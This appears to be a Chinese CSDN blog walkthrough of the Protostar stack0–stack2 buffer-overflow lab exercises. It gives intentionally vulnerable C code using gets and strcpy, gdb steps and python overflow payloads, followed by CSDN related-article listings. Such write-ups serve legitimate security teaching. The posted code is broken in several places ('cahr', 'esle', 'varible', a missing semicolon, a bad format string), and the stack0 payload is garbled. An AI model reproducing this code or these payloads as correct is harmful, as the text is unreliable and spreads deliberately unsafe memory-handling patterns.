Stack Buffer Overflow-protostar-stack0/stack1/stack2-0x04

最新推荐文章于 2020-07-20 22:35:15 发布
最新推荐文章于 2020-07-20 22:35:15 发布
阅读量347 收藏 1
点赞数
分类专栏: LiveOverflow-binary hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/93782605
版权

使用的protostar虚拟机镜像,源站点暂时不能访问,可自行google。
缓冲区溢出的第一关,protostar Stack0
About:
  这个级别介绍了可以在程序分配内存区域之外访问内存的概念,如何布局堆栈变量,以及在分配内存之外修改某些程序执行。

stack0.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char *argv[]){
	volatile int modified;
	cahr buffer[64];
	modified = 0;
	gets(buffer);
	
	if (modified != 0) {
		printf("You have changed the 'modified' variable\n");
	} esle {
		printf("Try again?\n")
	}
}

gets()函数,读取用户输入,直到换行符或eof。buf[64]位于堆栈内存中,因为它们是局部变量。在这种情况下,目标变量跟随缓冲区,读取超过缓冲区所能容纳的字符将继续向堆栈中写入数据,并最终覆盖修改后的零值(以及堆栈中包含的所有其他内容:返回指针、存储基指针、环境变量…)。
在这里插入图片描述
开始使用gdb调试程序:gdb /opt/protostar/bin/stack0
设置两个断点,在gets函数调用前和调用后:break 0x0804840c break 0x08048411
使用define hook-stop,在断点停止处执行设置的gdb指令:
  info registers
  x/24wx $esp
  x/2i $eip
run:
c (AAAAAAAAAAA)
在这里插入图片描述
可以看到程序是将’modified‘放到stack(0)的位置,然后是分配的buffer空间。
因此,如果放置的缓冲区超过了可以容纳的容量(64),它将溢出到堆栈中以前分配的项中。可以利用这一点,从而计算出:
  python -c 'print “A”(4+163+14)’ | ./stack0
在这里插入图片描述
#####################################################################

stack1.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
	volatile int modified;
	char buffer[64];
	if (argc == 1) {
		errx(1, "please specify an argument\n");
	}
	modified = 0;
	strcpy(buffer, argv[1]);
	
	if (modified == 0x61626364) {
		printf("you have correctly got the variable to the right value\n");
	} else {
		printf("Try again, you got 0x08x\n", modified);
	}
}

同样的策略,只不过最后的四个字节变为’dcba’(0x61626364),

在这里插入图片描述
#########################################################################

stack2.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char *argv[]){
	volatile int modified;
	char buffer[64];
	char *variable;

	variable = getenv("GREENIE");
	if (variable == NULL) {
		errx(1, "please set the GREENIE environment variable\n");
	}
	modified = 0;
	strcpy(buffer, varible);
	if (modified == 0x0d0a0d0a) {
		printf("you have correctly modified the variable\n");
	} else {
		printf("Try again, you got 0x%08x\n", modified);
	}
}

通过以下简单命令可以解决这个问题:

$ GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
$ export GREENIE
$ ./stack2
you have correctly modified the variable

将64个’A’和0x0d0a0d0a(小端)放入环境变量中。当上边的c程序读取环境变量时,将会缓冲区溢出到"modified"中。

Mandorr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Xcode 里快速搜索 Google, StackOverflow 插件.zip
09-24
Xcode 里快速搜索 Google, StackOverflow 插件.zip,搜索外部源(google、stackoverflow等)的xcode源编辑器扩展
[Windows编程] stack overflow != stack buffer overflow
anjichan4261的博客
01-29 228
经常看到有人把2个概念混淆, 其实这2者是有区别的。Windows 中它们的异常代码也是不同的: STATUS_STACK_OVERFLOW (0xc00000fd ) STATUS_STACK_BUFFER_OVERRUN (0xc0000409) 下面这篇文章很好地解释了它们的不同: Stack overflow (stack exhaustion) no...
【嵌入式安全扫盲一】Stack buffer overflow
自由的天空
08-16 1356
出处:https://en.wikipedia.org/wiki/Stack_buffer_overflow Stack buffer overflow From Wikipedia, the free encyclopedia For other uses, see Stack overflow (disambiguation). In sof
Exploit-Exercise之Protostar-stack
Yale的博客
07-20 1387
0x00 Protostar涉及栈溢出、堆溢出、格式化字符串漏洞、网络编程、及综合性漏洞。 本文将介绍stack部分。 关于环境准备,在官网https://exploit-exercises.lains.space/protostar/下载即可。下载后得到iso镜像,使用vmware安装。然后使用user/user即可登录 查看ip 知道ip后可以在kali中ssh连上 输入user即可 机器上所有需要分析的程序都在如下路径 0x0 来看第一关stack0 源码如下 这题很简单,就是在if里判断mo
protostar_stack1
weixin_30907523的博客
07-06 122
Protostar是little endian的。 这里面,我们要让修改的modified变量结果正好等于0x61626364。 我们用objdump -S stack1 > ~/stack1dump命令来把stack1的信息输入到这个文件中,再查看这个文件,找到main的入口: 当调用strcpy之前,栈中的情况大致是这样的: 所以bu...
redis-stack-server 7.2.0 安装包合集
最新发布
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
Z-Stack-Sample-Applications.zip_z-stack
09-23
TI Z-Stack Sample Applications
Z-Stack_Lighting_1_0_2
10-18
这个软件名称是 Z-Stack_Lighting_1_0_2,是TI(德州仪器)发布的基于CC2530的ZigBee协议栈,主要用于CC2530应用开发。
sopython-site:有关Stack Overflow的Python聊天室的网站
02-05
sopython-site:有关Stack Overflow的Python聊天室的网站
elk-stack-mongo-node-docker
05-13
elk-stack-mongo-node-docker
Stack buffer overflow (wiki)
charlix的专栏
01-22 1289
Stack buffer overflowFrom Wikipedia, the free encyclopediaJump to: navigation, searchFor other uses, see Stack overflow (disambiguation).In software, a stack buffer overflow occurs when a program writes to a memory address on the program's call stack outsi
stack overflowstack buffer overflow
weixin_34364135的博客
03-25 307
2019独角兽企业重金招聘Python工程师标准>>> ...
Exploit Exercises - Protostar Stack
u011500307的专栏
03-18 2721
这个网站是http://exploit-exercises.com/protostarStack 0: #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(
Protostar Stack Write Up
无节操
11-08 1474
Protostar Stack0 #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you
protostar_stack6
weixin_30443813的博客
07-21 145
这段程序程序要求调用getpath函数但是 调用者的地址不能以0xbf开头! ret表示返回地址。 __builtin_return_address(0)的含义是,得到当前函数返回地址,即此函数被别的函数调用,然后此函数执行完毕后,返回,所谓返回地址就是那时候的地址。 这个函数是gcc在linux下的特性,建议看这个文章,讲述的异常清晰: http://www.ibm.com/dev...
protostar_stack7
weixin_30802171的博客
07-22 108
这一次的代码如上所示 ---- 这一次和之前的不同在于: 1. 有返回值,是strdup(buffer) 函数的返回值~ 2. 0xbf 变为 0xb0了~ strdup函数的返回值是新申请的内存的地址,4字节,应该存放在eax上。 接下来,返回的时候,会执行返回地址所指向的语句,这个语句的位置不能是0b开头的,不能是栈里的东西, 同时,也不能是libc里的函数,它们...
简单ROP exploit入门之protostar stack7
无心插柳
09-24 6964
通过protostar stack7来入门最简单的ROP exploit
Protostar stack2
weixin_33720452的博客
04-14 103
AboutStack2 looks at environment variables, and how they can be set.This level is at /opt/protostar/bin/stack2Source code#include <stdlib.h>#include <unistd.h>#include <stdio...
protostar_stack2
weixin_30341735的博客
07-09 74
getenv 函数是获取环境变量的值 这个的obj文件的main部分: 从这个文件中,可以看出: mov %eax,0x5c(%esp) 这句可以看出,variable变量的存储位置是 esp + 92 mov $0x0,0x58(%esp) 这句可以看出,modified变量存储的位置是 esp + 88 lea 0x18(%esp),%esp 这句可以看出 ,b...
tf.stack([-1, 2, 4])
03-25
This is not a valid input for the `tf.stack()` ...stacked = tf.stack([a, b, c], axis=0) print(stacked) ``` This would output: ``` tf.Tensor( [[1 2 3] [4 5 6] [7 8 9]], shape=(3, 3), dtype=int32) ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值